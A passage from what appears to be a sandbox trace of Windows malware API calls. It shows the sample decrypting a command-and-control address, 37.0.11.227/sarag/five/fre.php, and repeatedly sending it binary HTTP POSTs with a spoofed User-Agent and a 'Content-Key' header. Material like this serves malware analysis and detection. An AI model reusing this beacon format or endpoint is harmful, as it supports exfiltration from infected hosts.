(HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0244.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.278] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.285] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0244.292] GetProcessHeap () returned 0x690000 [0244.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0244.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.293] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.294] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.294] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.294] GetProcessHeap () returned 0x690000 [0244.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0244.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.296] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0244.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.297] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.297] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0244.297] GetProcessHeap () returned 0x690000 [0244.297] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0244.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.298] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0244.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.299] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0244.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.300] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0244.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.301] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0244.301] GetProcessHeap () returned 0x690000 [0244.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0244.301] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0244.301] GetProcessHeap () returned 0x690000 [0244.301] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0244.301] socket (af=2, type=1, protocol=6) returned 0x690 [0244.301] connect (s=0x690, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0244.325] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0244.325] GetProcessHeap () returned 0x690000 [0244.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0244.325] GetProcessHeap () returned 0x690000 [0244.325] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0244.326] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.327] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0244.327] GetProcessHeap () returned 0x690000 [0244.327] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0244.327] GetProcessHeap () returned 0x690000 [0244.327] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.328] GetProcessHeap () returned 0x690000 [0244.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0244.328] GetProcessHeap () returned 0x690000 [0244.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0244.328] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.329] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0244.329] GetProcessHeap () returned 0x690000 [0244.329] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0244.329] GetProcessHeap () returned 0x690000 [0244.329] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.329] send (s=0x690, buf=0x6ad508*, len=242, flags=0) returned 242 [0244.330] send (s=0x690, buf=0x6aba40*, len=159, flags=0) returned 159 [0244.330] GetProcessHeap () returned 0x690000 [0244.330] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0244.330] recv (in: s=0x690, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0244.405] GetProcessHeap () returned 0x690000 [0244.405] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0244.405] GetProcessHeap () returned 0x690000 [0244.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0244.406] GetProcessHeap () returned 0x690000 [0244.406] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0244.407] GetProcessHeap () returned 0x690000 [0244.407] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0244.408] closesocket (s=0x690) returned 0 [0244.408] GetProcessHeap () returned 0x690000 [0244.408] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0244.408] GetProcessHeap () returned 0x690000 [0244.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.409] GetProcessHeap () returned 0x690000 [0244.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0244.409] GetProcessHeap () returned 0x690000 [0244.409] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0244.409] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x700) returned 0x690 [0244.411] Sleep (dwMilliseconds=0xea60) [0244.413] GetProcessHeap () returned 0x690000 [0244.413] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0244.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.414] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.419] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0244.424] GetProcessHeap () returned 0x690000 [0244.424] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0244.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.425] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0244.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.426] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.429] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.429] GetProcessHeap () returned 0x690000 [0244.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0244.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.431] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0244.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.432] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0244.433] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.433] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0244.433] GetProcessHeap () returned 0x690000 [0244.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0244.434] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.434] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.436] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.436] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.437] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.437] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.438] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.438] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.438] GetProcessHeap () returned 0x690000 [0244.438] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0244.438] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.438] GetProcessHeap () returned 0x690000 [0244.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0244.440] GetProcessHeap () returned 0x690000 [0244.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0244.444] GetProcessHeap () returned 0x690000 [0244.445] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0244.445] GetProcessHeap () returned 0x690000 [0244.445] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0244.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.446] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0244.461] GetProcessHeap () returned 0x690000 [0244.461] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0244.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.463] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.463] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.464] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.465] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.465] GetProcessHeap () returned 0x690000 [0244.465] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0244.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.466] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0244.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.468] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.469] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0244.469] GetProcessHeap () returned 0x690000 [0244.469] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0244.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.470] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0244.471] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.471] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0244.472] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.472] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0244.473] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.474] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0244.474] GetProcessHeap () returned 0x690000 [0244.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0244.474] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0244.474] GetProcessHeap () returned 0x690000 [0244.474] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab440 [0244.474] socket (af=2, type=1, protocol=6) returned 0x694 [0244.475] connect (s=0x694, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0244.585] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0244.585] GetProcessHeap () returned 0x690000 [0244.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0244.585] GetProcessHeap () returned 0x690000 [0244.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0244.586] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.587] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0244.587] GetProcessHeap () returned 0x690000 [0244.587] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0244.587] GetProcessHeap () returned 0x690000 [0244.588] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.588] GetProcessHeap () returned 0x690000 [0244.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0244.588] GetProcessHeap () returned 0x690000 [0244.588] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0244.589] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0244.591] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0244.591] GetProcessHeap () returned 0x690000 [0244.591] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0244.591] GetProcessHeap () returned 0x690000 [0244.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0244.591] send (s=0x694, buf=0x6ad508*, len=242, flags=0) returned 242 [0244.593] send (s=0x694, buf=0x6aba40*, len=159, flags=0) returned 159 [0244.594] GetProcessHeap () returned 0x690000 [0244.594] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0244.594] recv (in: s=0x694, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0244.669] GetProcessHeap () returned 0x690000 [0244.669] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0244.670] GetProcessHeap () returned 0x690000 [0244.670] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0244.671] GetProcessHeap () returned 0x690000 [0244.671] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0244.671] GetProcessHeap () returned 0x690000 [0244.672] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0244.672] closesocket (s=0x694) returned 0 [0244.673] GetProcessHeap () returned 0x690000 [0244.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab440 | out: hHeap=0x690000) returned 1 [0244.673] GetProcessHeap () returned 0x690000 [0244.673] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.673] GetProcessHeap () returned 0x690000 [0244.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0244.674] GetProcessHeap () returned 0x690000 [0244.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0244.674] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xf1c) returned 0x694 [0244.678] Sleep (dwMilliseconds=0xea60) [0244.688] GetProcessHeap () returned 0x690000 [0244.688] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0244.689] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.701] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0244.714] GetProcessHeap () returned 0x690000 [0244.714] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0244.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.716] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.717] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.717] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0244.718] GetProcessHeap () returned 0x690000 [0244.718] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0244.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.719] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0244.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.728] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0244.729] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.729] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0244.729] GetProcessHeap () returned 0x690000 [0244.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0244.730] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.734] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0244.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.739] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0244.739] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.740] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0244.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0244.741] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0244.741] GetProcessHeap () returned 0x690000 [0244.741] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0244.741] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0244.742] GetProcessHeap () returned 0x690000 [0244.742] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0244.742] GetProcessHeap () returned 0x690000 [0244.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0244.743] GetProcessHeap () returned 0x690000 [0244.743] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0244.743] GetProcessHeap () returned 0x690000 [0244.743] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0244.744] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.745] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0244.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.754] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0244.764] GetProcessHeap () returned 0x690000 [0244.764] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0244.765] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.765] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0244.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.767] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0244.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0244.772] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, 